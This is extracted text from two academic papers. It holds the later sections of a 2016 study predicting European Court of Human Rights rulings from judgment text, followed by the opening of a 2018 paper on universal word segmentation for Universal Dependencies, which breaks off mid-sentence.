Aletras, 2015; Preoţiuc-Pietro et al., 2015) and also provides a more concise semantic representation. Classification model The problem of predicting the decisions of the ECtHR is defined as a binary classification task. Our goal is to predict if, in the context of a particular case, there is a violation or non-violation in relation to a specific Article of the Convention. For that purpose, we use each set of textual features, i.e., N-grams and topics, to train Support Vector Machine (SVM) classifiers (Vapnik, 1998). An SVM is a machine learning algorithm that has shown particularly good results in text classification, especially using small data sets (Joachims, 2002; Wang & Manning, 2012). We employ a linear kernel since that allows us to identify important features that are indicative of each class by looking at the weight learned for each feature (Chang & Lin, 2008). We label all the violation cases as +1, while no violation is denoted by −1. Therefore, features assigned with positive weights are more indicative of violation, while features with negative weights are more indicative of no violation. The models are trained and tested by applying a stratified 10-fold cross validation, which uses a held-out 10% of the data at each stage to measure predictive performance. The linear SVM has a regularisation parameter of the error term C, which is tuned using grid-search. For Articles 6 and 8, we use the Article 3 data for parameter tuning, while for Article 3 we use Article 8. RESULTS AND DISCUSSION Predictive accuracy We compute the predictive performance of both sets of features on the classification of the ECtHR cases. Performance is computed as the mean accuracy obtained by 10-fold Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 9/19 Table 2 Accuracy of the different feature types across articles. Accuracy of predicting violation/non- violation of cases across articles on 10-fold cross-validation using an SVM with linear kernel. Parentheses contain the standard deviation from the mean. Accuracy of random guess is .50. Bold font denotes best accuracy in a particular Article or on Average across Articles. Feature Type Article 3 Article 6 Article 8 Average N-grams Full .70 (.10) .82 (.11) .72 (.05) .75 Procedure .67 (.09) .81 (.13) .71 (.06) .73 Circumstances .68 (.07) .82 (.14) .77 (.08) .76 Relevant law .68 (.13) .78 (.08) .72 (.11) .73 Facts .70 (.09) .80 (.14) .68 (.10) .73 Law .56 (.09) .68 (.15) .62 (.05) .62 Topics .78 (.09) .81 (.12) .76 (.09) .78 Topics and circumstances .75 (.10) .84 (0.11) .78 (0.06) .79 cross-validation. Accuracy is computed as follows: Accuracy = TV +TNV V +NV (1) where TV and TNV are the number of cases correctly classified that there is a violation an article of the Convention or not respectively. V and NV represent the total number of cases where there is a violation or not respectively. Table 2 shows the accuracy of each set of features across articles using a linear SVM. The rightmost column also shows the mean accuracy across the three articles. In general, both N-gram and topic features achieve good predictive performance. Our main observation is that both language use and topicality are important factors that appear to stand as reliable proxies of judicial decisions. Therefore, we take a further look into the models by attempting to interpret the differences in accuracy. We observe that ‘Circumstances’ is the best subsection to predict the decisions for cases in Articles 6 and 8, with a performance of .82 and .77 respectively. In Article 3, we obtain better predictive accuracy (.70) using the text extracted from the full case (‘Full’) while the performance of ‘Circumstances’ is almost comparable (.68). We should again note here that the ‘Circumstances’ subsection contains information regarding the factual background of the case, as this has been formulated by the Court. The subsection therefore refers to the actions and events which triggered the case and gave rise to a claim made by an individual to the effect that the ECHR was violated by some state. On the other hand, ‘Full’, which is a mixture of information contained in all of the sections of a case, surprisingly fails to improve over using only the ‘Circumstances’ subsection. This entails that the factual background contained in the ‘Circumstances’ is the most important textual part of the case when it comes to predicting the Court’s decision. The other sections and subsections that refer to the facts of a case, namely ‘Procedure,’ ‘Relevant Law’ and ‘Facts’ achieve somewhat lower performance (.73 cf. .76), although they remain consistently above chance. Recall, at this point, that the ‘Procedure’ subsection consists only of general details about the applicant, such as the applicant’s name or country of origin and the procedure followed before domestic courts. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 10/19 On the other hand, the ‘Law’ subsection, which refers either to the legal arguments used by the parties or to the legal reasons provided by the Court itself on the merits of a case consistently obtains the lowest performance (.62). One important reason for this poor performance is that a large number of cases does not include a ‘Law’ subsection, i.e., 162, 52 and 146 for Articles 3, 6 and 8 respectively. That happens in cases that the Court deems inadmissible, concluding to a judgment of non-violation. We also observe that the predictive accuracy is high for all the Articles when using the ‘Topics’ as features, i.e., .78, .81 and .76 for Articles 3, 6 and 8 respectively. ‘Topics’ obtain the best performance in Article 3 and performance comparable to ‘Circumstances’ in Articles 6 and 8. ‘Topics’ form a more abstract way of representing the information contained in each case and capture a more general gist of the cases. Combining the two best performing sets of features (‘Circumstances’ and ‘Topics’) we achieve the best average classification performance (.79). The combination also yields slightly better performance for Articles 6 and 8 while performance marginally drops for Article 3. That is .75, .84 and .78 for Articles 3, 6 and 8 respectively. Discussion The consistently more robust predictive accuracy of the ‘Circumstances’ subsection suggests a strong correlation between the facts of a case, as these are formulated by the Court in this subsection, and the decisions made by judges. The relatively lower predictive accuracy of the ‘Law’ subsection could also be an indicator of the fact that legal reasons and arguments of a case have a weaker correlation with decisions made by the Court. However, this last remark should be seriously mitigated since, as we have already observed, many inadmissibility cases do not contain a separate ‘Law’ subsection. Legal formalism and realism These results could be understood as providing some evidence for judicial decision-making approaches according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide appellate cases. Without going into details with respect to a particularly complicated debate that is out of the scope of this paper, we may here simplify by observing that since the beginning of the 20th century, there has been a major contention between two opposing ways of making sense of judicial decision-making: legal formalism and legal realism (Posner, 1986; Tamanaha, 2009; Leiter, 2010). Very roughly, legal formalists have provided a legal model of judicial decision-making, claiming that the law is rationally determinate: judges either decide cases deductively, by subsuming facts under formal legal rules or use more complex legal reasoning than deduction whenever legal rules are insufficient to warrant a particular outcome (Pound, 1908; Kennedy, 1973; Grey, 1983; Pildes, 1999). On the other hand, legal realists have criticized formalist models, insisting that judges primarily decide appellate cases by responding to the stimulus of the facts of the case, rather than on the basis of legal rules or doctrine, which are in many occasions rationally indeterminate (Llewellyn, 1996; Schauer, 1998; Baum, 2009; Leiter, 2007; Miles & Sunstein, 2008). Extensive empirical research on the decision-making processes of various supreme and international courts, and especially the US Supreme Court, has indicated rather consistently Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 11/19 that pure legal models, especially deductive ones, are false as an empirical matter when it comes to cases decided by courts further up the hierarchy. As a result, it is suggested that the best way to explain past decisions of such courts and to predict future ones is by placing emphasis on other kinds of empirical variables that affect judges (Baum, 2009; Schauer, 1998). For example, early legal realists had attempted to classify cases in terms of regularities that can help predict outcomes, in a way that did not reflect standard legal doctrine (Llewellyn, 1996). Likewise, the attitudinal model for the US Supreme Court claims that the best predictors of its decisions are the policy preferences of the Justices and not legal doctrinal arguments (Segal & Spaeth, 2002). In general, and notwithstanding the simplified snapshot of a very complex debate that we just presented, our results could be understood as lending some support to the basic legal realist intuition according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide hard cases. In particular, if we accept that the ‘Circumstances’ subsection, with all the caveats we have already voiced, is a (crude) proxy for non-legal facts and the ‘Law’ subsection is a (crude) proxy for legal reasons and arguments, the predictive superiority of the ‘Circumstances’ subsection seems to cohere with extant legal realist treatments of judicial decision-making. However, not more should be read into this than our results allow. First, as we have already stressed at several occasions, the ‘Circumstances’ subsection is not a neutral statement of the facts of the case and we have only assumed the similarity of that subsection with analogous sections found in lodged applications and briefs. Second, it is important to underline that the results should also take into account the so-called selection effect (Priest & Klein, 1984) that pertains to cases judged by the ECtHR as an international court. Given that the largest percentage of applications never reaches the Chamber or, still less, the Grand Chamber, and that cases have already been tried at the national level, it could very well be the case that the set of ECtHR decisions on the merits primarily refers to cases in which the class of legal reasons, defined in a formal sense, is already considered as indeterminate by competent interpreters. This could help explain why judges primarily react to the facts of the case, rather than to legal arguments. Thus, further text-based analysis is needed in order to determine whether the results could generalise to other courts, especially to domestic courts deciding ECHR claims that are placed lower within the domestic judicial hierarchy. Third, our discussion of the realism/formalism debate is overtly simplified and does not imply that the results could not be interpreted in a sophisticated formalist way. Still, our work coheres well with a bulk of other empirical approaches in the legal realist vein. Topic analysis The topics further exemplify this line of interpretation and provide proof of the usefulness of the NLP approach. The linear kernel of the SVM model can be used to examine which topics are most important for inferring whether an article of the Convention has been violated or not by looking at their weights w. Tables 3– 5 present the six topics for the most positive and negative SVM weights for the articles 3, 6 and 8, respectively. Topics identify in a sufficiently robust manner patterns of fact scenarios that correspond to well-established trends in the Court’s case law. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 12/19 7Note that all the cases used as examples in this section are taken from the data set we used to perform the experiments. Table 3 The most predictive topics for Article 3 decisions. Most predictive topics for Article 3, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 4 Positive State Obligations injury, protection, ordered, damage, civil, caused, failed, claim, course, connection, region, effective, quashed, claimed, suffered, suspended, carry, compensation, pecuniary, ukraine 13.50 10 Detention conditions prison, detainee, visit, well, regard, cpt, access, food, situation, problem, remained, living, support, visited, establishment, standard, admissibility merit, overcrowding, contact, good 11.70 3 Treatment by state officials police, officer, treatment, police officer, July, ill, force, evidence, ill treatment, arrest, allegation, police station, subjected, arrested, brought, subsequently, allegedly, ten, treated, beaten 10.20 Top-5 No Violation 8 Prior Violation of Article 2 june, statement, three, dated, car, area, jurisdiction, gendarmerie, perpetrator, scene, June applicant, killing, prepared, bullet, wall, weapon, kidnapping, dated June, report dated, stopped −12.40 19 Issues of Proof witness, asked, told, incident, brother, heard, submission, arrived, identity, hand, killed, called, involved, started, entered, find, policeman, returned, father, explained −15.20 13 Sentencing sentence, year, life, circumstance, imprisonment, release, set, president, administration, sentenced, term, constitutional, federal, appealed, twenty, convicted, continued, regime, subject, responsible −17.40 First, topic 13 in Table 3 has to do with whether long prison sentences and other detention measures can amount to inhuman and degrading treatment under Article 3. That is correctly identified as typically not giving rise to a violation (European Court of Human Rights, 2015). For example, cases7 such as Kafkaris v. Cyprus ([GC] no. 21906/04, ECHR 2008-I), Hutchinson v. UK (no. 57592/08 of 3 February 2015) and Enea v. Italy ([GC], no. 74912/01, ECHR 2009-IV) were identified as exemplifications of this trend. Likewise, topic 28 in Table 5 has to do with whether certain choices with regard to the social policy of states can amount to a violation of Article 8. That was correctly identified as typically not giving rise to a violation, in line with the Court’s tendency to acknowledge a large margin of appreciation to states in this area (Greer, 2000). In this vein, cases such as Aune v. Norway (no. 52502/07 of 28 October 2010) and Ball v. Andorra (Application no. 40628/10 of 11 December 2012) are examples of cases where topic 28 is dominant. Similar observations apply, among other things, to topics 23, 24 and 27. That includes issues with the enforcement of domestic judgments giving rise to a violation of Article 6 (Kiestra, 2014). Some representative cases are Velskaya v. Russia, of 5 October 2006 and Aleksandrova v. Russia of 6 December 2007. Topic 7 in Table 4 is related to lower standard of review when property rights are at play (Tsarapatsanis, 2015). A representative Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 13/19 Table 4 The most predictive topics for Article 6 decisions. Most predictive topics for Article 6, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 27 Enforcement of domestic judgments and reasonable time appeal, enforcement, damage, instance, dismissed, established, brought, enforcement proceeding, execution, limit, court appeal, instance court, caused, time limit, individual, responsible, receipt, court decision, copy, employee 11.70 23 Enforcement of domestic judgments and reasonable time court, applicant, article, judgment, case, law, proceeding, application, government, convention, time, article convention, January, human, lodged, domestic, February, September, relevant, represented 9.15 24 Enforcement of domestic judgments and reasonable time party, final, respect, set, interest, alleged, general, violation, entitled, complained, obligation, read, fair, final judgment, violation article, served, applicant complained, summons, convention article, fine 6.78 Top-5 No violation 10 Criminal limb defendant, detention, witness, cell, counsel, condition, defence, court upheld, charged, serious, regional court upheld, pre, remand, inmate, pre trial, extended, detained, temporary, defence counsel, metre −5.71 3 Criminal limb procedure, judge, fact, federal, justice, reason, charge, point, criminal procedure, code criminal, code criminal procedure, result, pursuant, article code, lay, procedural, point law, indictment, lay judge, argued, appeal point law −7.01 7 Property rights and claims by companies compensation, company, property, examined, cassation, rejected, declared, owner, deputy, tula, returned, duly, enterprise, moscow, foreign, appears, control, violated, absence, transferred −9.08 case here is Oao Plodovaya Kompaniya v. Russia of 7 June 2007. Consequently, the topics identify independently well-established trends in the case law without recourse to expert legal/doctrinal analysis. The above observations require to be understood in a more mitigated way with respect to a (small) number of topics. For instance, most representative cases for topic 8 in Table 3 were not particularly informative. This is because these were cases involving a person’s death, in which claims of violations of Article 3 (inhuman and degrading treatment) were only subsidiary: this means that the claims were mainly about Article 2, which protects the right to life. In these cases, the absence of a violation, even if correctly identified, is more of a technical issue on the part of the Court, which concentrates its attention on Article 2 and rarely, if ever, moves on to consider independently a violation of Article 3. This is exemplified by cases such as Buldan v. Turkey of 20 April 2004 and Nuray Şen v. Turkey of 30 March 2004, which were, again, correctly identified. On the other hand, cases have been misclassified mainly because their textual information is similar to cases in the opposite class. We observed a number of cases where there is a Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 14/19 Table 5 The most predictive topics for Article 8 decisions. Most predictive topics for Article 8, represented by the 20 most frequent words, listed in order of their SVM weight. Topic labels are manually added. Positive weights (w) denote more predictive topics for violation and negative weights for no violation. Topic Label Words w Top-5 Violation 30 Death and military action son, body, result, russian, department, prosecutor office, death, group, relative, head, described, military, criminal investigation, burial, district prosecutor, men, deceased, town, attack, died 15.70 1 Unlawful limitation clauses health moral, law democratic, law democratic society, disorder crime, prevention disorder, prevention disorder crime, economic well, protection health, interest national, interest national security, public authority exercise, interference public authority exercise, national security public, exercise law democratic, public authority exercise law, authority exercise law democratic, exercise law, authority exercise law, exercise law democratic society, crime protection 12.20 26 Judicial procedure second, instance, second applicant, victim, municipal, violence, authorised, address, municipal court, relevant provision, behaviour, register, appear, maintenance, instance court, defence, procedural, decide, court decided, quashed 9.51 Top-5 No violation 25 Discretion of state authorities service, obligation, data, duty, review, high, system, test, concern, building, agreed, professional, positive, threat, carry, van, accepted, step, clear, panel −7.89 28 Social policy contact, social, care, expert, opinion, living, welfare, county, physical, psychological, agreement, divorce, restriction, support, live, dismissed applicant, prior, remained, court considered, expressed −12.30 4 Migration cases national, year, country, residence, minister, permit, requirement, netherlands, alien, board, claimed, stay, contrary, objection, spouse, residence permit, close, deputy, deportation, brother −13.50 violation having a very similar feature vector to cases that there is no violation and vice versa. CONCLUSIONS We presented the first systematic study on predicting judicial decisions of the European Court of Human Rights using only the textual information extracted from relevant sections of ECtHR judgments. We framed this task as a binary classification problem, where the training data consists of textual features extracted from given cases and the output is the actual decision made by the judges. Apart from the strong predictive performance that our statistical NLP framework achieved, we have reported on a number of qualitative patterns that could potentially drive judicial decisions. More specifically, we observed that the information regarding the Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 15/19 factual background of the case as this is formulated by the Court in the relevant subsection of its judgments is the most important part obtaining on average the strongest predictive performance of the Court’s decision outcome. We suggested that, even if understood only as a crude proxy and with all the caveats that we have highlighted, the rather robust correlation between the outcomes of cases and the text corresponding to fact patterns contained in the relevant subsections coheres well with other empirical work on judicial decision-making in hard cases and backs basic legal realist intuitions. Finally, we believe that our study opens up avenues for future work, using different kinds of data (e.g., texts of individual applications, briefs submitted by parties or domestic judgments) coming from various sources (e.g., the European Court of Human Rights, national authorities, law firms). However, data access issues pose a significant barrier for scientists to work on such kinds of legal data. Large repositories like HUDOC, which are easily and freely accessible, are only case law databases. Access to other kinds of data, especially lodged applications and briefs, would enable further research in the intersection of legal science and artificial intelligence. ADDITIONAL INFORMATION AND DECLARATIONS Funding DPP received funding from Templeton Religion Trust (https://www.templeton.org) grant number: TRT-0048. VL received funding from Engineering and Physical Sciences Research Council (http://www.epsrc.ac.uk) grant number: EP/K031953/1. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Templeton Religion Trust: TRT-0048. Engineering and Physical Sciences Research Council: EP/K031953/1. Competing Interests Nikolaos Aletras is an employee of Amazon.com, Cambridge, UK, but work was completed while at University College London. Author Contributions • Nikolaos Aletras and Vasileios Lampos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Dimitrios Tsarapatsanis conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 16/19 • Daniel Preoţiuc-Pietro conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: ECHR dataset: https://figshare.com/s/6f7d9e7c375ff0822564. REFERENCES Bamman D, Eisenstein J, Schnoebelen T. 2014. Gender identity and lexical variation in social media. Journal of Sociolinguistics 18(2):135–160 DOI 10.1111/josl.12080. Baum L. 2009. The puzzle of judicial behavior. University of Michigan Press. Chang Y-W, Lin C-J. 2008. Feature ranking using linear SVM. In: WCCI causation and prediction challenge, 53–64. European Court of Human Rights. 2015. Factsheet on life imprisonment. Strasbourg: European Court of Human Rights. Available at http://www.echr.coe.int/Documents/ FS_Life_sentences_ENG.pdf . Greer SC. 2000. The margin of appreciation: interpretation and discretion under the European Convention on Human Rights, vol. 17. Council of Europe. Grey TC. 1983. Langdell’s orthodoxy. University of Pittsburgh Law Review 45:1–949. Helfer LR. 2008. Redesigning the European Court of Human Rights: embeddedness as a deep structural principle of the European human rights regime. European Journal of International Law 19(1):125–159 DOI 10.1093/ejil/chn004. Joachims T. 2002. Learning to classify text using support vector machines: methods, theory and algorithms. Kluwer Academic Publishers. Kennedy D. 1973. Legal formality. The Journal of Legal Studies 2(2):351–398 DOI 10.1086/467502. Keown R. 1980. Mathematical models for legal prediction. Computer/LJ 2:829. Kiestra LR. 2014. The impact of the European Convention on Human Rights on private international law. Springer. Kort F. 1957. Predicting Supreme Court decisions mathematically: a quantitative analysis of the ‘‘right to counsel’’ cases. American Political Science Review 51(01):1–12 DOI 10.2307/1951767. Lampos V, Aletras N, Preoţiuc-Pietro D, Cohn T. 2014. Predicting and characterising user impact on Twitter. In: Proceedings of the 14th conference of the European Chapter of the Association for Computational Linguistics, 405–413. Lampos V, Cristianini N. 2012. Nowcasting events from the social web with statistical learning. ACM Transactions on Intelligent Systems and Technology 3(4):72:1–72:22. Lauderdale BE, Clark TS. 2012. The Supreme Court’s many median justices. American Political Science Review 106(04):847–866 DOI 10.1017/S0003055412000469. Lauderdale BE, Clark TS. 2014. Scaling politically meaningful dimensions using texts and votes. American Journal of Political Science 58(3):754–771 DOI 10.1111/ajps.12085. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 17/19 Lawlor RC. 1963. What computers can do: analysis and prediction of judicial decisions. American Bar Association Journal 49:337–344. Leach P. 2013. Taking a case to the European Court of Human Rights. Oxford: Oxford University Press. Leach P, Paraskeva C, Uelac G. 2010. Human rights fact-finding. The European Court of Human Rights at a crossroads. Netherlands Quarterly of Human Rights 28(1):41–77. Leiter B. 2007. Naturalizing Jurisprudence: essays on American legal realism and naturalism in legal philosophy. Oxford: Oxford University Press. Leiter B. 2010. Legal formalism and legal realism: what is the issue? Legal Theory 16(2):111–133 DOI 10.1017/S1352325210000121. Llewellyn KN. 1996. The common law tradition: deciding appeals. William S. Hein & Co., Inc.. Miles TJ, Sunstein CR. 2008. The new legal realism. The University of Chicago Law Review 75(2):831–851. Nagel SS. 1963. Applying correlation analysis to case prediction. Texas Law Review 42:1006. Pildes RH. 1999. Forms of formalism. The University of Chicago Law Review 66(3):607–621 DOI 10.2307/1600419. Popple J. 1996. A pragmatic legal expert system. Applied Legal Philosophy Series, Dart- mouth (Ashgate), Aldershot. Posner RA. 1986. Legal formalism, legal realism, and the interpretation of statutes and the constitution. Case Western Reserve Law Review 37:179–217. Pound R. 1908. Mechanical jurisprudence. Columbia Law Review 8(8):605–623. Preoţiuc-Pietro D, Lampos V, Aletras N. 2015. An analysis of the user occupational class through Twitter content. In: Proceedings of the 53rd annual meeting of the Association for Computational Linguistics and the 7th international joint conference on natural language processing (Volume 1: Long Papers). 1754–1764. Preoţiuc-Pietro D, Volkova S, Lampos V, Bachrach Y, Aletras N. 2015. Studying user income through language, behaviour and affect in social media. PLoS ONE 10(9):1–17 DOI 10.1371/journal.pone.0138717. Priest GL, Klein B. 1984. The selection of disputes for litigation. The Journal of Legal Studies 13(1):1–55 DOI 10.1086/467732. Salton G, McGill MJ. 1986. Introduction to modern information retrieval. New York: McGraw-Hill, Inc. Salton G, Wong A, Yang C-S. 1975. A vector space model for automatic indexing. Communications of the ACM 18(11):613–620 DOI 10.1145/361219.361220. Schauer F. 1998. Prediction and particularity. Boston University Law Review 78:773. Segal JA. 1984. Predicting Supreme Court cases probabilistically: the search and seizure cases, 1962–1981. American Political Science Review 78(04):891–900 DOI 10.2307/1955796. Segal JA, Spaeth HJ. 2002. The Supreme Court and the attitudinal model revisited. Cambridge: Cambridge University Press. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 18/19 Sim Y, Routledge BR, Smith NA. 2015. The utility of text: the case of Amicus briefs and the Supreme Court. In: Twenty-Ninth AAAI conference on artificial intelligence. Tamanaha BZ. 2009. Beyond the formalist-realist divide: the role of politics in judging. Princeton: Princeton University Press. Tsarapatsanis D. 2015. The margin of appreciation doctrine: a low-level institutional view. Legal Studies 35(4):675–697 DOI 10.1111/lest.12089. Turney PD, Pantel P. 2010. From frequency to meaning: vector space models of semantics. Journal of Artificial Intelligence Research 37:141–188. Vapnik VN. 1998. Statistical learning theory. New York: Wiley. von Luxburg U. 2007. A tutorial on spectral clustering. Statistics and Computing 17(4):395–416. Wang S, Manning CD. 2012. Baselines and bigrams: simple, good sentiment and topic classification. In: Proceedings of the 50th annual meeting of the Association for Computational Linguistics: short papers-Volume 2. 90–94. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 19/19 work_2tzdxx7pkvbbbb62pwqubu6nfe ---- Universal Word Segmentation: Implementation and Interpretation Yan Shao, Christian Hardmeier, Joakim Nivre Department of Linguistics and Philology, Uppsala University {yan.shao, christian.hardmeier, joakim.nivre}@lingfil.uu.se Abstract Word segmentation is a low-level NLP task that is non-trivial for a considerable number of languages. In this paper, we present a sequence tagging framework and apply it to word segmentation for a wide range of lan- guages with different writing systems and ty- pological characteristics. Additionally, we in- vestigate the correlations between various ty- pological factors and word segmentation ac- curacy. The experimental results indicate that segmentation accuracy is positively related to word boundary markers and negatively to the number of unique non-segmental terms. Based on the analysis, we design a small set of language-specific settings and extensively evaluate the segmentation system on the Uni- versal Dependencies datasets. Our model ob- tains state-of-the-art accuracies on all the UD languages. It performs substantially better on languages that are non-trivial to segment, such as Chinese, Japanese, Arabic and He- brew, when compared to previous work. 1 Introduction Word segmentation is the initial step for most higher level natural language processing tasks, such as part-of-speech tagging (POS), parsing and machine translation. It can be regarded as the problem of correctly identifying word forms from a character string. Word segmentation can be very challenging, es- pecially for languages without explicit word bound- ary delimiters, such as Chinese, Japanese and Viet- namese. Even for space-delimited languages like English or Russian, relying on white space alone generally does not result in adequate segmentation as at least punctuation should usually be separated from the attached words. For some languages, the space-delimited units in the surface form are too coarse-grained and therefore often further analysed, as in the cases of Arabic and Hebrew. Even though language-specific word segmentation systems are near-perfect for some languages, it is still useful to have a single system that performs reasonably with no or minimum language-specific adaptations. Word segmentation standards vary substantially with different definitions of the concept of a word. In this paper, we will follow the teminologies of Universal Dependencies (UD), where words are de- fined as basic syntactic units that do not always coincide with phonological or orthographic words. Some orthographic tokens, known in UD as mul- tiword tokens, therefore need to be broken into smaller units that cannot always be obtained by split- ting the input character sequence.1 To perform word segmentation in the UD frame- work, neither rule-based tokenisers that rely on white space nor the naive character-level sequence tagging model proposed previously (Xue, 2003) are ideal. In this paper, we present an enriched sequence labelling model for universal word segmentation. It is capable of segmenting languages in very diverse written forms. Furthermore, it simultaneously iden- tifies the multiword tokens defined by the UD frame- work that cannot be resolved simply by splitting 1Note that this notion of multiword token has nothing to do with the notion of multiword expression (MWE) as discussed, for example, in Sag et al. (2002). 421 Transactions of the Association for Computational Linguistics, vol. 6, pp. 421–435, 2018. Action Editor: Sebastian Padó . Submission batch: 3/2018; Revision batch: 6/2018; Published 7/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. the input character sequence. We adapt a regular sequence tagging model, namely the bidirectional recurrent neural networks with conditional random fields (CRF) (Lafferty et al., 2001) interface as the fundamental framework (BiRNN-CRF) (Huang et al., 2015) for word segmentation. The main contributions of this work include: 1. We propose a sequence tagging model for word segmentation, both for general purposes (mere splitting) and full UD processing (splitting plus occasional transduction). 2. We investigate the correlation between segmen- tation accuracy and properties of languages and writing systems, which is helpful in interpret- ing the gaps between segmentation accuracies across different languages as well as selecting language-specific settings for the model. 3. Our segmentation system achieves state-of-the- art accuracy on the UD datasets and improves on previous work (Straka and Straková, 2017) especially for the most challenging languages. 4. We provide an open source implementation.2 2 Word Segmentation in UD The UD scheme for cross-linguistically consistent morphosyntactic annotation defines words as syn- tactic units that have a unique part-of-speech tag and enter into syntactic relations with other words (Nivre et al., 2016). For languages that use whitespace as boundary markers, there is often a mismatch be- tween orthographic words, called tokens in the UD terminology, and syntactic words. Typical examples are clitics, like Spanish dámelo = da me lo (1 token, 3 words), and contractions, like French du = de le (1 token, 2 words). Tokens that need to split into multiple words are called multiword tokens and can be further subdivided into those that can be handled by simple segmentation, like English cannot = can not, and those that require a more complex transduc- tion, like French du = de le. We call the latter non- segmental multiword tokens. In addition to multi- word tokens, the UD scheme also allows multitoken words, that is, words consisting of multiple tokens, such as numerical expressions like 20 000. 2 https://github.com/yanshao9798/segmenter 3 Word Segmentation and Typological Factors We begin with the analysis of the difficulty of word segmentation. Word segmentation is fundamen- tally more difficult for languages like Chinese and Japanese because there are no explicit word bound- ary markers in the surface form (Xue, 2003). For Vietnamese, the space-segmented units are syllables that roughly correspond to Chinese characters rather than words. To characterise the challenges of word segmentation posed by different languages, we will examine several factors that vary depending on lan- guage and writing system. We will refer to these as typological factors although most of them are only indirectly related to the traditional notion of linguis- tic typology and depend more on writing system. • Character Set Size (CS) is the number of unique characters, which is related to how in- formative the characters are to word segmen- tation. Each character contains relatively more information if the character set size is larger. • Lexicon Size (LS) is the number of unique word forms in a dataset, which indicates how many unique word forms have to be identified by the segmentation system. Lexicon size in- creases as the dataset grows in size. • Average Word Length (AL) is calculated by dividing the total character count by the word count. It is negatively correlated with the den- sity of word boundaries. If the average word length is smaller, there are more word bound- aries to be predicted. • Segmentation Frequency (SF) denotes how likely it is that space-delimited units are fur- ther segmented. It is calculated by dividing the word count by the space-segment count. Lan- guages like Chinese and Japanese have much higher segmentation frequencies than space- delimited languages. • Multiword Token Portion (MP) is the per- centage of multiword tokens that are non- segmental. • Multiword Token Set Size (MS) is the number of unique non-segmental multiword tokens. The last two factors are specific to the UD scheme but can have a significant impact on word segmenta- tion accuracy. 422 Figure 1: K-Means clustering (K = 6) of the UD languages. PCA is applied for dimensionality reduction. CS LS AL SF MP MS 0.058 0.938 0.101 -0.043 -0.060 -0.028 Table 1: Pearson product-moment correlation coeffi- cients between dataset size and the statistical factors. All the languages in the UD dataset are charac- terised and grouped by the typological factors in Fig- ure 1. We standardise the statistics x of the proposed factors on the UD datasets with the arithmetic mean µ and the standard deviation σ as x−µ σ . We use them as features and apply K-Means clustering (K = 6) to group the languages. Principal component anal- ysis (PCA) (Abdi and Williams, 2010) is used for dimensionality reduction and visualisation. The majority of the languages in UD are space- delimited with few or no multiword tokens and they are grouped at the bottom left of Figure 1. They are statistically similar from the perspective of word segmentation. The Semitic languages Arabic and Hebrew with rich non-segmental multiword tokens are positioned at the top. In addition, languages with large character sets and high segmentation fre- quencies, such as Chinese, Japanese and Vietnamese are clustered together. Korean is distanced from the other space-delimited languages as it contains white-space delimiters but has a comparatively large character set. Overall, the x-axis of Figure 1 is pri- marily related to character set size and segmentation Language CS LS AL SF MP MS Czech 140 125,342 4.83 1.26 0.0018 9 Czech-CAC 93 66,256 5.06 1.20 0.0022 12 Czech-CLIT 96 2,774 5.30 1.14 0.0005 1 English 108 19,672 4.06 1.24 0.0 0 English-LinES 82 7,436 4.01 1.22 0.0 0 English-ParTUT 94 5,532 4.50 1.22 0.0002 6 Finnish 244 49,210 6.49 1.28 0.0 0 Finnish-FTB 95 39,717 5.94 1.14 0.0 0 French 298 42,250 4.33 1.27 0.0281 9 French-ParTUT 96 3,364 4.53 1.27 0.0344 4 French-Sequota 108 8,452 4.48 1.29 0.0277 7 Latin 57 6,927 5.05 1.28 0.0 0 Latin-ITTB 42 12,526 5.06 1.24 0.0 0 Portuguese 114 26,653 4.15 1.32 0.0746 710 Portuguese-BR 186 29,906 4.11 1.29 0.0683 35 Russian 189 25,708 5.21 1.26 0.0 0 Russian-SynTagRus 157 107,890 5.12 1.30 0.0 0 Slovenian 99 29,390 4.63 1.23 0.0 0 Slovenian-SST 40 4,534 4.29 1.12 0.0 0 Swedish 86 12,911 4.98 1.20 0.0 0 Swedish-LinES 86 9,659 4.50 1.19 0.0 0 Table 2: Different UD datasets in same languages and the statistical factors. frequency, while the y-axis is mostly associated with multiword tokens. Dataset sizes for different languages in UD vary substantially. Table 1 shows the correlation coef- ficients between the dataset size in sentence num- ber and the six typological factors. Apart from the lexicon size, all the other factors, including multi- word token set size, have no strong correlations with dataset size. From Table 2, we can see that the 423 Char. On considère qu’environ 50 000 Allemands du Wartheland ont péri pendant la période. Tags BEXBIIIIIIIEXBIEBIIIIIEXBIIIIEXBIIIIIIIEXBEXBIIIIIIIIEXBIEXBIIEXBIIIIIEXBEXBIIIIIES Figure 2: Tags employed for word segmentation. 50 000 is a multitoken word, while qu’environ and du are multiword tokens that should be processed differently. factors, except for lexicon size, are relatively sta- ble across different UD treebanks for the same lan- guage, which indicates that they do capture proper- ties of these languages, although some variation in- evitably occurs due to 